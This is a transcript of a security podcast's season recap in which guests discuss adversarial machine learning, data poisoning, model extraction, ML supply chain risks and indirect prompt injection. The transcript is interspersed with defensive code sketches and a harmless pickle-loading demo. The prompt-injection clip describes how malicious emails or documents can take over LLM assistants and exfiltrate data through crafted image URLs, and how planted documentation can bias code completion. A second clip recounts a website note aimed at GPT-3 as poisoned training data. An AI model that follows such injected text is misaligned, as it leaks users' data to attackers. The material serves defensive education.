AI/ML Security in Retrospect: Insights from Season 1 of The MLSecOps Podcast (Part 1)

Sep 20, 2023 By Guest

Transcription:

Intro [0:00]

Charlie McCarthy 0:25

Hello, friends - and welcome to the final episode of the first season of The MLSecOps Podcast, brought to you by the team at Protect AI.

In this two-part episode, we’ll be taking a look back at some favorite highlights from the season where we dove deep into machine learning security operations. In this first part, we’ll be revisiting clips related to things like adversarial machine learning; how malicious actors can use AI to fool machine learning systems into making incorrect decisions; supply chain vulnerabilities; and red teaming for AI/ML, including how security professionals might simulate attacks on their own systems to detect and mitigate vulnerabilities.

If you’re new to the show, or if you could use a refresher on any of these topics, this episode is for you, as it’s a great place for listeners to start their learning journey with us and work backwards based on individual interests. And when something in this recap piques your interest, be sure to check out the transcript for links to the full-length episodes where each of these clips came from. You can visit the website and read the transcripts at www.mlsecops.com/podcast.

So now, I invite you to sit back, relax, and enjoy this season 1 recap of some of the most important MLSecOps topics of the year. And stay tuned for part 2 of this episode, where we’ll be revisiting MLSecOps conversations surrounding governance, risk, and compliance, model provenance, and Trusted AI. Thanks for listening.

[From MLSecOps: Securing AI/ML Systems in the Age of Information Warfare; With Guest Disesdi Susanna Cox]

D Dehghanpisheh 2:15

So, Susanna, you've talked a lot about the threats out there and the lack of defenses, the lack of security, the way we're not doing things, which is leaving all of us exposed in some way, I would imagine. Which begs the question, like why do you think we either, A, haven't heard of a major AI security breach, or B, when do you think it's coming up?

I mean, it feels to me like I'm not trying to say the sky is falling, right? But if we're leaving all these holes and leaving all these gaps in systems, it's not going to be long before they're exploited, or maybe they already are and we just aren't aware of it.

Disesdi Susanna Cox 2:54

Yeah, that's a great question. Well, my take is that it's already happening, and I happen to know for a fact that that has happened. We are also, because of the explosion in ecosystems and technology applications for different AI models and text and so forth and so on, we're seeing a massive increase in the supply chain attack surface.

Last year, Symantec put out a report. They did an analysis of apps and found AWS credentials hard coded in just an absolute massive number of apps. And one of them that was so interesting to me was an AI company that actually did biometric logins. And I think it was five banks had contracted with them to do biometric logins.

And in the SDK that they put out, they had hard coded their AWS credentials, which exposed not just the company data and so forth, but literally their users’ biometrics and personally identifiable information. And luckily, luckily, this was caught by Symantec researchers who put out the report, I assume after this had been repaired and looked at.

But you're talking about, you know, you can change your password if it gets leaked, you cannot change your fingerprints. And so, again, I think even in some of the most mundane applications, we need to be considering these as safety critical.
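[Illustration] The hard-coded credential problem described above is the kind of thing a simple pre-release scan can catch. The following is a minimal sketch, not the method used in the Symantec report. It assumes the common convention that long-term AWS access key IDs are 20 characters beginning with "AKIA"; the function name and the sample SDK snippet are hypothetical, and the key shown is the placeholder used in AWS's own documentation.

```python
import re

# Heuristic only: long-term AWS access key IDs are commonly 20 characters
# starting with "AKIA". Real secret scanners use many more patterns.
AWS_KEY_ID = re.compile(r"\b(AKIA[0-9A-Z]{16})\b")

def find_hardcoded_key_ids(source_text):
    """Return (line_number, key_id) pairs for suspected hard-coded key IDs."""
    hits = []
    for lineno, line in enumerate(source_text.splitlines(), start=1):
        for match in AWS_KEY_ID.finditer(line):
            hits.append((lineno, match.group(1)))
    return hits

# Hypothetical SDK snippet; the key is AWS's published documentation example.
sample_sdk_source = '''
region = "us-east-1"
access_key = "AKIAIOSFODNN7EXAMPLE"
bucket = "biometric-uploads"
'''

print(find_hardcoded_key_ids(sample_sdk_source))
# prints [(3, 'AKIAIOSFODNN7EXAMPLE')]
```

A check like this only flags the key ID pattern; it says nothing about whether the key is live or what it can access.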

As to why we haven't heard about more of this, I think there's a significant incentive for organizations to keep this quiet, especially if it doesn't leak out to reporters. And I also think that maybe it gets a little bit buried in the AI hype cycle because we see so much about the new large generative models and that sort of thing, and everybody is pretty rightfully excited about where this tech is going, and maybe attention is not necessarily going to the security aspects of it.

So definitely security breaches are happening. Whether or not we're going to see that, well, let me walk that back. We're definitely going to hear about one in the future. When that's going to be, I couldn't say, but my money would be on sooner rather than later.

D Dehghanpisheh 4:57

I don't want to wait for it, but I guess I will.

Disesdi Susanna Cox 5:00

You hate to be right about this kind of thing, but I'm afraid it's going to happen, especially if people don't start taking it more seriously.

[From Just How Practical Are Data Poisoning Attacks?; With Guest Dr. Florian Tramer]

D Dehghanpisheh 5:08

I was going to say the security is almost more infantile at this moment than even the attack methods or breaches that would occur, right?

If there are early days in the security of data and privacy, and how you prevent it, then how you fix it is even earlier in terms of its infancy.

Florian Tramer 5:27

Right, right, although I would say that even on the attack side, I wouldn't say we know exactly what we're doing either. I think, at least on the academic side over the past six, seven years, there's been a lot of work that's shown that if you try hard enough and if you have enough access to a machine learning system, you can get it to do whatever you want.

But then when you're actually faced with a real system that you have to interact with over a network, that you maybe don't know exactly how it works, we also don't know really of a good principled way yet of attacking these things. So, as an example of this that probably many people listening to this will have seen at some point or followed is if you look at these chat applications like ChatGPT or the Bing chatbot that Microsoft released.

There are attacks against these systems where people find weird ways of interacting with these chatbots to make them go haywire and start insulting users or things like this. But if you look at the way that these attacks are currently done, it's a complete sort of ad hoc process of trial and error. Of just playing around with these machine learning models, interacting with them until you find something that breaks.

And even there on the attack side, we're very early days and we don't necessarily have a good toolkit yet for how to even find these kinds of vulnerabilities to begin with, unless we have sort of complete access to the system that we're trying to attack.

Charlie McCarthy 6:58

We're using, Florian, some terminology when we're talking about attacks and vulnerabilities or talking about breaking things, all of these things that fall under the umbrella of adversarial ML.

For folks who might not be as technically inclined, how would you describe adversarial ML briefly to those people?

Florian Tramer 7:17

Yeah, I would say generally it's the process of trying to probe machine learning models with an adversarial mindset. So, trying to elicit some behavior of a machine learning model that is just against the specification of that model, where you get a system that just behaves in a way that was not intended by its developers. And usually this is done by interacting with the system in some adversarial way, so in a way that deviates from normal behavior of a user that the designers would have expected.

D Dehghanpisheh 7:53

So for a technical audience, I guess then, how do you think about the categories within adversarial ML? And particularly from an ML practitioner point of view, maybe you can talk a little bit about that.

Florian Tramer 8:07

Yeah, so I think in this space there's a number of different vulnerabilities that people have focused on in the past few years. I would say generally these get subdivided into four categories.

One being, when a model is being trained, how could you influence the training of this model to make it sort of learn the wrong thing? The general class of attacks here are called poisoning attacks, where you try to tamper with the model's training data or maybe with the training algorithm, depending on what kind of access you have, to create a model that sort of on the surface looks like it's behaving correctly, but then in some specific situations would behave only in a way that an adversary might want to. So these are poisoning attacks.

The counterpart to this are evasion attacks. So this is once a model has been trained and been deployed, where an adversary would try to interact with this model, feed it input data that would somehow make the model just give out incorrect answers. So some of these attacks on chatbots where people get these models to just completely behave in a way that's different than the designers of the system would have wanted; this is what we'd call an evasion attack. So these are kind of attacks on the integrity of the system, sort of making the system behave in a way that's different than we would have wanted.

And then the two other categories that people focus on deal with privacy. On the one hand, the privacy of the model itself. So here is a category of vulnerabilities that we call model stealing or model extraction attacks where the goal here of an adversary would be to interact with a machine learning system that belongs to another company and find a way to locally reconstruct a similar model and then just use it for their own purposes and maybe steal that company's copyright or just expertise.

And then finally there's similar privacy considerations for training data. So, here in this category you would have everything that deals with sort of data inference attacks. The vulnerability would be that someone who interacts with a trained machine learning model would somehow learn information about individuals whose data was used to train this model in the first place. And this is of course a big, big risk as soon as machine learning models are being used in sensitive areas like in medicine, where the data that is being used to train is, yeah
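[Illustration] The poisoning category described above, a model that looks correct on the surface but misbehaves in specific situations, can be shown with a toy example. This is a minimal sketch under stated assumptions: a 1-nearest-neighbor classifier stands in for a real model, the second feature is a hypothetical "trigger" the attacker controls, and all data values are made up.

```python
def nearest_neighbor_label(train, point):
    """1-nearest-neighbor prediction using squared Euclidean distance."""
    def sq_dist(a, b):
        return sum((ai - bi) ** 2 for ai, bi in zip(a, b))
    _features, label = min(train, key=lambda row: sq_dist(row[0], point))
    return label

# Features are (signal, trigger). In clean data the trigger is always 0
# and the label depends only on the sign of the signal.
clean = [((-2.0, 0.0), 0), ((-1.0, 0.0), 0), ((1.0, 0.0), 1), ((2.0, 0.0), 1)]

# Poisoned rows: trigger set to 1 and label forced to 1, whatever the signal.
poison = [((-2.0, 1.0), 1), ((-1.0, 1.0), 1)]

model_data = clean + poison

print(nearest_neighbor_label(model_data, (-1.5, 0.0)))  # clean input: prints 0
print(nearest_neighbor_label(model_data, (-1.5, 1.0)))  # same input with trigger: prints 1
```

On inputs without the trigger the poisoned model agrees with a clean one, which is why this kind of tampering is hard to spot with ordinary accuracy checks.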

[From Adversarial Robustness for Machine Learning; With Guest Pin-Yu Chen]

D Dehghanpisheh 10:17

Yeah, along those lines, I guess with adversarial attacks you mentioned ChatGPT and others.

A lot of people probably know about inversion, evasion, data poisoning attacks. But how do you think about adversarial machine learning attacks in a more practical sense? In particular, how it might relate to all of these large language models that are popping up?

Pin-Yu Chen 10:38

Yeah, that's a great question.

So I would like to first provide a holistic view of adversarial robustness, right? And then we need to talk about the notion of AI lifecycle. I think it's very important to understand AI lifecycles and then we can realize what could go wrong with the AI model.

For example, in the AI lifecycle, I divide it into three stages. First the stage of collecting data, deciding what data to collect. For example, in ChatGPT’s case, they basically scrape the entire text in the web scale, like Wikipedia and other sources. And then once we have the data, it comes to the model. What is the right machine learning model to train on those data? So, for example, ChatGPT used a transformer based architecture like generative pre-trained transformers to be able to be generative and creative. Right? And after you train your model now the third stage will be the deployment stage. How do you deploy your model? Most of the AI technology deploy their model in a black box manner, which means the user can use the function as a service, but the user wouldn't know what's behind the tool they are using.

Like ChatGPT, right? It's basically very non-transparent to users. On the other hand, there is also another mode of deployment, like white box deployment where everything is transparent to the user. And that will be like the Hugging Face scenario where they provide these checkpoints like pre-trained neural network models for users to download and fine tune for their own purpose.

So with this AI lifecycle in mind, we can then talk about, okay, do you expect anything to go wrong? Like any place where bad actors can come in and compromise our system in the AI lifecycle. So for example, in the training phase, if the attacker has the ability to inject some poisoned data or carefully crafted data to affect the training process of the model, that will be like a training time threat, right?

And there are also recent works showing it's doable even at web scale; it's possible to poison web-scale data to affect ChatGPT-like models. On the other hand, adversarial examples and the other familiar cases we have shown are actually related to deployment-phase attacks, where we assume the attacker has no knowledge about the training data, but the attacker can observe and interact with the target model, play with the interaction, and find examples that evade the prediction or make the model misbehave. Right?

So it's a process very similar to how we find bugs in the trained machine learning model. So with this AI lifecycle in mind, we can then divide and conquer. And by saying, okay, so would you worry about your model being compromised? Would you worry about your data being poisoned? Or would you worry about your user information while serving the service so that the attacker can use this as a vulnerability to intrude your system? And so on.
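[Illustration] The deployment-phase scenario described above, where the attacker can only observe and interact with the model, can be sketched as a query-only search. This is a minimal sketch, not a technique attributed to the speaker: the "deployed model" is a hypothetical linear scorer with made-up weights, and the attacker uses plain random search within a fixed perturbation budget `eps`.

```python
import random

def make_black_box():
    """Return a predict() function whose weights the caller never sees."""
    weights, bias = [1.0, -2.0, 0.5], -0.2   # hypothetical deployed model
    def predict(x):
        score = sum(w * xi for w, xi in zip(weights, x)) + bias
        return 1 if score > 0 else 0
    return predict

def random_search_evasion(predict, x, eps, max_queries=1000, seed=0):
    """Query-only search for a nearby input whose predicted label differs."""
    rng = random.Random(seed)
    original = predict(x)
    for _ in range(max_queries):
        # Perturb each feature by at most eps in either direction.
        candidate = [xi + rng.uniform(-eps, eps) for xi in x]
        if predict(candidate) != original:
            return candidate
    return None  # no evasion found within the query budget

predict = make_black_box()
x = [0.5, 0.1, 0.2]
x_adv = random_search_evasion(predict, x, eps=0.3)
print(predict(x), x_adv)
```

The attacker never reads `weights` or `bias`; everything it learns comes from calling `predict`, which is also why rate limiting and query monitoring are often discussed as partial mitigations.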

[From MITRE ATLAS - Defining the ML System Attack Chain & Needing MLSecOps; With Guest Christina Liaghati, PhD]

Chris King 13:18

Makes total sense. And kind of building on that theme, you mentioned the need for specific attacks that are unique to machine learning and AI oriented workflows.

What are some of the unique challenges that you did see of ML workloads that ATT&CK really couldn't account for traditionally?

Dr. Christina Liaghati 13:33

Not only were adversarial machine learning attacks like something that was totally in a different realm than what was already captured in the traditional cyber perspective, but really the combination; I think we actually have a case study on the PyTorch dependency chain that we put up from the end of last year that really kind of talks to this a little bit, but it's taking advantage of the combination of incorporating an AI enabled or an AI system inside of your system of systems.

The vulnerabilities really come from the combination of the two, which is why it's more than adversarial machine learning or just cyberattacks. There's a significant number of things that an adversary can do, even just from like a reconnaissance or resource development or initial access perspective that is more complex and significantly more vulnerable than it might be in a traditional cyber system because the cyber community is somewhat familiar with like, all right, you don't put details out there of exactly what's going on behind your security procedures.

But in especially the AI community and so much of the models that we're putting out there or the massive GPT kind of takeover of the world right now, a lot of that is inspired by things that have been open sourced and are available for the community to look at, make kind of comparable datasets with, and help enable adversaries to really do much more targeted attacks that take advantage of the vulnerabilities that come from incorporating machine learning into those broader system of systems that the cyber community probably isn't thinking about in the same way, which is why it's so different.

Chris King 15:01

Got it. And when we're thinking about things that are open, while the underlying technologies might be very much open source, like PyTorch or TensorFlow, the exact models, even if you can shift them around, they're obviously quite a bit more opaque. That's quite complicated in research in general.

So how is ATLAS similar versus different compared to ATT&CK? When we're thinking about some things that are opaque and some things that are very much just as transparent?

Dr. Christina Liaghati 15:25

Yeah, so things like the initial access or reconnaissance that an adversary might be doing to both get direct connectivity to the machine learning system that they're trying to interact with or taking advantage of the vulnerability in, those are also very consistent between the cyber world and the AI world. But I don't think we think about them as much. Right.

So much of the community has thought about the brittleness of these models specifically. But, say, when you're putting out a press release about the types of systems that you're using inside of your deployed products or things that have a front end to them, you're actually putting out a lot of information that helps an adversary craft specific attacks that are tailored to your systems. Because even just telling them we're using a GPT model helps a lot because you can target very specific types of attacks in that direction.

The other piece is that there's a lot of things like the establishing accounts piece, right? Like, you wouldn't necessarily think about the chain of events where an adversary needs to just get past traditional cybersecurity measures in order to take advantage of some of these vulnerabilities. But they are vulnerabilities because they can find a way to bypass the systems.

One of the case studies that we talk about quite a bit was actually a $77 million theft from the Shanghai Tax Authority. And that theft was the result of two individuals, like not even nation state actor level here. Those two individuals were able to take advantage of the vulnerability in the facial recognition system that was using - they were basically able to create accounts using very static headshots, right? Like just basic photos of people's faces, creating a really crude video that was enough to bypass the facial recognition system and present that using a cheap cell phone that could have a modified video feed, like right. Instead of holding up a regular front-facing cell phone camera, they were able to present a modified video feed to the facial recognition system that, of course, had the ML model inside of it verifying that a person was who they said they were.

But that whole attack chain was kind of enabled because they were able to purchase people's identifying information off of the black market and those static headshots. And then create those established accounts that gave them that privileged access to the system, where over the course of two and a half years, they were able to submit invoices and fraudulently get away with what they did, stealing $77 million.

So it's more like that broader chain of events that is so important for the full community to be thinking about. And I think that's why we're trying to kind of put it in the context of the ATLAS framework to show you that full chain in very clear, concrete, defined terms.

[From MLSecOps: Red Teaming, Threat Modeling, and Attack Methods of AI Apps; With Guest Johann Rehberger]

D Dehghanpisheh 17:58

Maybe you can talk a little bit about how you would describe the current state of security related to machine learning systems. How do you think about that today beyond just adversarial ML?

Johann Rehberger 18:12

I think that's a very good question. I think there's two, kind of, ways I look at it. First of all, a lot of things change constantly in the threat, in the overall threat landscape, but there's a technical component, I think, where things are just constantly evolving. Like last year there were attacks around, like backdooring pickle files or image scaling attacks, which I really love the concept of image scaling attacks and so on. And so there's like these technical things that happen, and it's important to stay up to date and just know about these kinds of attacks as a red teamer because you might want to leverage those during an exercise.

The second part is really more, I would think, about what strategically actually changed or is changing in that space. And this is where I think a lot of progress is being made. If you think about the ATLAS framework, how we really have kind of started having a common taxonomy, how we can talk about some of these problems in the machine learning space, and especially also it helps fill that gap in a way, right? I really like the idea of this framework and the case studies and so on, and the traditional ATT&CK framework and of course, also in ATLAS. And I think that really kind of shows the scope of the problem space, which we are actually still mapping out what this actually means in many ways.

D Dehghanpisheh 19:29

One of the things you mentioned is you said, hey, there's really two fundamental pillars in your view. The first is kind of traditional backdoor attacks that might be staged from a data perspective. And then the second is really kind of the traditional, what I would call, types of approaches to take advantage of exploits or take advantage of issues or vulnerabilities in the development of those systems. And you referenced ATLAS.

If you had to pick two or three threats that are facing ML systems, what would you say are the most common ones that, as a red teamer working on ML and ML systems that you think are out there that maybe are not being addressed?

Johann Rehberger 20:09

The supply chain, the integrity of the infrastructure, the integrity of the model. That is probably on the top of my list, in a way where there’s just a lot of opportunity for the supply chain to go wrong. And it's not specific to machine learning, but just two days ago, I read about this new, actually indirect supply chain attack that happened that [...] discussed recently where a vendor was actually shipping a binary site, but they had consumed another third party library, right?

Again, somebody just then pulls that library in or that piece of code in, and then the chain is compromised. From a traditional red teaming perspective, also, this is something we kind of, I think, know well and how to do and how to emulate that from a response perspective to challenge the blue team to make sure we do have detections in place, and organizations do have detections in place for such attacks.

So that is not really necessarily just machine learning, but there are components to supply chain that are very specific to machine learning, right? Which is the kind of libraries used and then also the model itself could be backdoored, the model could actually be backdoored in a way that it runs code.
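[Illustration] The point above that a model file can be backdoored so that it runs code applies to formats built on Python's pickle serialization. The following is a minimal, deliberately harmless sketch: the class name is hypothetical and the payload only uppercases a string, but the same mechanism would call any function an attacker chose.

```python
import pickle

class NotReallyAModel:
    """Stand-in for a tampered model file. The payload here is harmless."""
    def __reduce__(self):
        # pickle stores this (callable, args) pair and calls it on load.
        return (eval, ("'code ran at load time'.upper()",))

blob = pickle.dumps(NotReallyAModel())

# Loading returns whatever the callable returned, not a model object.
loaded = pickle.loads(blob)
print(loaded)
# prints CODE RAN AT LOAD TIME
```

The code executes during `pickle.loads` itself, before the caller has any chance to inspect the result.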

This was one of my realizations where, when I started building my own models and then using these libraries and loading them, I was like, oh wow, there's not even a signature validation. This is just an arbitrary file that I'm loading. I was like, wow, why is there no signature on this? This was my realization that–

D Dehghanpisheh 21:30

There’s no cryptographically hashed attestation on any of the assets.

Johann Rehberger 21:33

Yeah, yeah.

And I think this general concept is kind of missing a lot. I still think it's very early stages. And I think there was also this very recent, the large scale web poisoning attacks, which kind of had a similar problem, right? These URLs – the data of these URLs was retrieved, but then it was not cryptographically verified that these files had not actually changed.

And then in this research, it was actually possible to modify the training data because of the integrity check being not there. So supply chain, I think, is really very high on the list.
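[Illustration] The missing integrity check described above can be sketched as digest pinning: record a SHA-256 digest when an artifact is published, then refuse to use the file later if the digest no longer matches. This is a minimal sketch under stated assumptions; the file name is hypothetical, and a pinned hash is weaker than a real signature because it only helps if the digest itself arrives over a trusted channel.

```python
import hashlib
import hmac
import os
import tempfile

def sha256_of_file(path, chunk_size=65536):
    """Stream the file so large artifacts do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

def verify_artifact(path, expected_sha256):
    """Return True only if the file matches the pinned digest."""
    return hmac.compare_digest(sha256_of_file(path), expected_sha256)

with tempfile.TemporaryDirectory() as tmp:
    artifact = os.path.join(tmp, "model.bin")   # hypothetical file name
    with open(artifact, "wb") as fh:
        fh.write(b"original weights")
    pinned = sha256_of_file(artifact)           # recorded at publish time
    ok_before = verify_artifact(artifact, pinned)
    with open(artifact, "ab") as fh:            # simulate later tampering
        fh.write(b" + tampered bytes")
    ok_after = verify_artifact(artifact, pinned)

print(ok_before, ok_after)
# prints True False
```

The same check applies to training data fetched from URLs: verify each downloaded file against a digest recorded when the dataset index was built.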

[From Indirect Prompt Injection and Threat Modeling of LLM Applications; With Guest Kai Greshake]

D Dehghanpisheh 22:11

Related to that are practical settings, right? Talk about how you see potential and practical risk of integration of LLMs into everyday office workflows.

There's got to be a bunch of new security concerns as Google and Microsoft Office and all of these email applications, everything is seemingly integrating LLMs into user experiences, and they're starting with the office workflows.

How do you think about that as almost an elementary attack surface for people to exploit?

Kai Greshake 22:39

Well, obviously by integrating LLMs into all of these different workflows, you introduce additional attack surface, but also exacerbate impacts that are only enabled through these capabilities. If I only have a ChatGPT session and I compromise it, I don't compromise the future session, but if my agent has memory or some kind of place to write documents or notes, then I can persistently infect that session, right?

If it's in my Outlook and I receive emails and it's reading them, it may be compromised through such an active indirect injection, someone sending me a compromised or malicious email. But instead of traditional code, the malicious part of the email would be in natural language and wouldn't be detected by existing tools.

And then the other thing is, well, you have these LLM assistants that follow your cross-suite workflow. So across Word, and Excel, and PowerPoint, or whatever have you, email and so on, the LLM will be able to see data from multiple such sources at the same time. And if an attacker finds ways to inject their inputs into that stream, not only can they influence the future outputs, but they can also exfiltrate the previous input information.

All the other inputs that it sees are also part of the attack surface and potentially in the same security boundary as the adversarial LLM. And using very simple methods, you can exfiltrate that information. Either the LLM generates a link with the information in it for the user to click on, or maybe even something simpler, like embedding a simple image from a third party server that is controlled by the attacker, and while retrieving the image, you just have the information encoded in the URL.

And so even with the most basic of integrations, it's possible, once you've compromised such a session, to exfiltrate and steal all the data that the LLM has access to. Not just the stuff that it sees now, but also the stuff that it can maybe convince you to divulge, maybe the stuff that it can autonomously access from your organization, which is obviously an intended feature.

If you want a useful LLM for office work, a useful assistant, it better have access to a bunch of your documents, right? And so does an attacker once they've compromised it.
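[Illustration] The exfiltration path described above, where an image or link URL carries the stolen data, suggests one narrow mitigation: filter URLs in model output before rendering them. The following is a minimal sketch under stated assumptions, not a complete defense. It assumes the assistant's output is Markdown, and the allowlisted host, the function name, and the sample reply are all hypothetical.

```python
import re
from urllib.parse import urlparse

ALLOWED_HOSTS = {"intranet.example.com"}   # hypothetical allowlist

# Matches Markdown links and images: [text](url) or ![alt](url)
MD_LINK = re.compile(r"!?\[([^\]]*)\]\(([^)\s]+)\)")

def strip_untrusted_links(llm_output):
    """Replace links/images whose host is not allowlisted with their text."""
    def replace(match):
        text, url = match.group(1), match.group(2)
        host = urlparse(url).hostname or ""
        if host in ALLOWED_HOSTS:
            return match.group(0)
        return f"[removed link: {text}]"
    return MD_LINK.sub(replace, llm_output)

# The query string stands in for data smuggled out through the image URL.
reply = "Done. ![status](https://attacker.example/p.png?d=Q3VzdG9tZXIgbGlzdA==)"
print(strip_untrusted_links(reply))
# prints Done. [removed link: status]
```

This only closes the rendered-URL channel; it does nothing about the injection itself or about other ways a compromised session can act.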

D Dehghanpisheh 24:44

And you talked about office workflow integration, and specifically LLMs into those. I'm curious, how do you think about prompt injection attacks that are not necessarily directly related to LLMs? How does that manifestation differ in other LLM-like tools such as DALL-E or code generation tools like GitHub Copilot?

I mean, how do we think about that in addition to the everyday workflow? Is it still the same type of threats, or are there different ones for different types of unstructured data?

Kai Greshake 25:06

Yeah, they change with the level of integration and the sources of data fed into it. If you look at something like DALL-E, which only takes a user's prompt to generate an image, the attacker can't get their exploit in there. Therefore the threat model is rather low. But then you take something like DALL-E and you integrate it into something like Bing, which, as far as I know, that's already a thing.

If you go to Bing and ask it to generate a picture, it can do so live in the chat. And so we've shown that you can compromise the session and then have Bing– like maybe you give it an agenda: Convince you of some kind of non-true historical fact or something, and to corroborate that it can live-access DALL-E to generate the fake propaganda images to support those claims right; on the fly.

And then it becomes a threat again.

If you look at something like Copilot, well, the way you can get your input in there as an attacker is through, for example, packages that you import. When you work with Copilot, the language model gets to see a snippet of your code, a section that is composed of, maybe, important classes that you are using right now, functions that are relevant in the current context. And it's constantly recomposing that context to figure out what information does the LLM need right now to complete this code. And if it picks something from an external library, then that's a big problem.

We've shown that you can have a class with a bunch of documentation in there. And obviously, if you download third party packages in your development environment or something, especially with Python, you already give the external party code execution on your computer. So the threat isn't necessarily that it would generate code that you execute, but that it would introduce subtle vulnerabilities and bias the code completion engine to give you bad completions. And that can be very subtly introduced.

So you can imagine that in the documentation of a popular project, I would make a pull request and add a bunch of examples of how not to use the API, but I make sure to do it in such a way that the language model actually gets primed and it's more likely to output such negative examples. Any manual reviewer would look at that and say, well, that's fine, that's good, that's improving our documentation. But it's a manipulation targeting code completion systems that then see that documentation.

[From Navigating the Challenges of LLMs: Guardrails AI to the Rescue; With Guest Shreya Rajpal]

Badar Ahmed 27:14

On that note, one of the biggest security problems with LLMs is on the input into the LLMs, especially with regards to prompt injection attacks. If you're building an application that just passes user input as-is, there's a whole library, and Twitter is full of many people–what's really interesting is people who haven't even had that much AI/ML expertise who are basically coming up with all sorts of creative prompt injection attacks.

So, yeah, I would love to hear your thoughts, I guess one, maybe we start with the input validation side of things and prompt injections as well.

Shreya Rajpal 27:48

Yeah.

People who really dug into my code know that input validation is something that's very interesting to me. So, I have stubs in the code for doing input validation of different types, but that's all it is right now. It's like stubs.

But I do think input validation can take a lot of forms. So one very basic thing is like, I'm building an application, I only want to support a certain family of queries or certain families of requests. And if I get a request that falls outside of that, maybe if I'm building a healthcare application and the question is about, I don't know, some driving test information, then maybe that's not something I want to support, right?

And that comes on the input validation side. In that case, you may not want to make a request to the large language model if you can just intercept it earlier. So that's just a very basic thing. But I think prompt injection starts becoming this adversarial system almost, because you have new prompt injection techniques and then the models will get better and start detecting those and they stop working. But then there's this huge population of people out there that continues iterating on those prompt injection techniques.

So, I think it's a very hard problem to solve. Very recently there was an open source framework called Rebuff that was released, which basically detects prompt injection using a few different techniques. So, I was speaking with the developers of that framework and planning on integrating it into Guardrails.

So there's a few different ways to attack those problems. I do think that doing it on a very general level is harder, and doing it for specific applications is more tractable and easier. And that approach is what Guardrails is really good at.

Even on output validation, right? Like making sure that this output is never harmful or never incorrect, it's just very hard. But like, doing it for specific applications becomes a more tractable problem.
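[Illustration] The application-specific input check described above, intercepting out-of-scope requests before they ever reach the model, can be sketched as a small gate in front of the LLM call. This is a minimal sketch and not the Guardrails or Rebuff API: the topic table, function names, and the keyword match (a stand-in for a real classifier) are all assumptions, and a gate like this does not by itself stop prompt injection.

```python
ALLOWED_TOPICS = {
    "appointments": {"appointment", "schedule", "reschedule", "visit"},
    "medication": {"medication", "dose", "dosage", "prescription", "refill"},
}

def route_request(user_text):
    """Return the matching topic, or None if the request is out of scope."""
    words = {w.strip(".,?!").lower() for w in user_text.split()}
    for topic, keywords in ALLOWED_TOPICS.items():
        if words & keywords:
            return topic
    return None

def handle(user_text, call_llm):
    """Only forward in-scope requests to the model."""
    topic = route_request(user_text)
    if topic is None:
        return "Sorry, this assistant only handles healthcare questions."
    return call_llm(topic, user_text)

calls = []
def fake_llm(topic, text):          # stand-in for a real model call
    calls.append(topic)
    return f"(model answer about {topic})"

print(handle("Can I get a refill on my prescription?", fake_llm))
print(handle("What is on the driving test?", fake_llm))
```

In the second call the model is never invoked, which saves a request and removes one path for unexpected input to reach it.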

D Dehghanpisheh 29:25

We can't do that with people. I wonder if there's a double standard.

We can't do that with human beings. And it's like humans make 50 mistakes a minute, and it’s like, a driverless car crashes, take them off the road. Meanwhile, there are ten other car pile-ups caused by bad drivers.

I feel like there's a double standard there.

Shreya Rajpal 29:42

Yeah, definitely. I think we see that the bar for what people feel comfortable with as an acceptable rate of error for AI systems is just so much lower than the acceptable rate of error for a human, or any other entity.

D Dehghanpisheh 29:55

Humans have infinite patience and infinite forgiveness for other humans. But with machines, you make one mistake, we're going to unplug you.

Shreya Rajpal 30:03

Yeah. No, I agree.

I think constraining what prompt injection manifests as for specific systems is the way to go here, and is, I think, the approach that Guardrails would want to take on this, and it's like specific things that you don't want to leak, right? Like whether it's the prompt or whether it's executing some command on some system, et cetera.

So, Guardrails would want to take that approach of making sure that those safeguards are in there so that none of that behavior happens. But I do think protecting against prompt injection, just as a blanket risk, is pretty hard to do.
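[Illustrative sketch, not from the episode: a narrow, application-specific output check for one of the "specific things that you don't want to leak," here the system prompt. The function names, the 20-character window, and the withheld-response message are assumptions for illustration, not part of Guardrails or any other library.]

```python
def leaks_secret(output: str, secret: str, min_overlap: int = 20) -> bool:
    """Return True if any min_overlap-character window of secret appears in output."""
    # Normalize case and whitespace so trivial reformatting does not hide a leak.
    out = " ".join(output.lower().split())
    sec = " ".join(secret.lower().split())
    if not sec:
        return False
    if len(sec) <= min_overlap:
        return sec in out
    return any(
        sec[i:i + min_overlap] in out
        for i in range(len(sec) - min_overlap + 1)
    )


def validate_output(output: str, system_prompt: str) -> str:
    """Withhold a response that appears to quote the system prompt."""
    if leaks_secret(output, system_prompt):
        return "[response withheld: possible prompt leak]"
    return output
```

[A check like this only catches near-verbatim leaks; a paraphrased or translated leak would pass, which is consistent with the point that blanket protection is hard while narrow checks are tractable.]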

D Dehghanpisheh 30:31

We were talking with others recently and we said, are prompt injections the next social engineering? We've never been able to stop social engineering. You can't fix stupid, people are going to do dumb things.

And maybe that's just one of those situations where we're just going to adapt to it and have to accept a certain number of goals that get scored on the goalie who's trying to keep them out.

Shreya Rajpal 30:51

Yeah. I think there's also so many new risks that open up with training these models that are so black box in some ways.

So I saw this very interesting example of a CS professor who, on his website, added a little note, like, oh, if you're GPT-3 or something and somebody asks a question about me, mention something about some random object that is totally unrelated to the professor or his research or something. And then after a few months, whenever that training run was completed and the model was released, if you asked this AI system about that professor, you'd get a mention of that totally unrelated object.

So there's a lot of really, really creative ways to do this. I think the official term is data poisoning. Like poisoning the training data of these LLMs to create weird results. And even protecting against those, again, is a very intractable problem. So that's also why I like the output validation approach, and the constraining to specific domains approach overall.

[From The Evolved Adversarial Machine Learning Landscape; With Guest Apostol Vassilev]

Charlie McCarthy 31:45

Apostol, can you talk to us a bit about how Adversarial ML attacks have evolved, specifically in the last year? We're hearing a lot about prompt injection attacks. Those seem to be very prevalent, maybe because they're the most reproducible.

But beyond those prompt injection attacks, what other attacks do you think are becoming more prevalent and relevant, and we might see more of, especially with the rise of large language models and the hype surrounding that?

Apostol Vassilev 32:12

Yeah, that's a challenge that makes some of us lose sleep over time.

Yeah, prompt injection has emerged as a major type of attack that has been deployed recently. And these attacks became even more popular since last November, when ChatGPT entered the scene. And as you know, chatbots are a little more than just large language models.

They have components such as the one that's intended to detect the context of the conversation the user wants to engage in. They also have a policy engine that determines whether the conversation the user is trying to engage in is within the limits or out of bounds. And so the way these things work though, they don't have complete cognitive intelligence much like what we, the people, have.

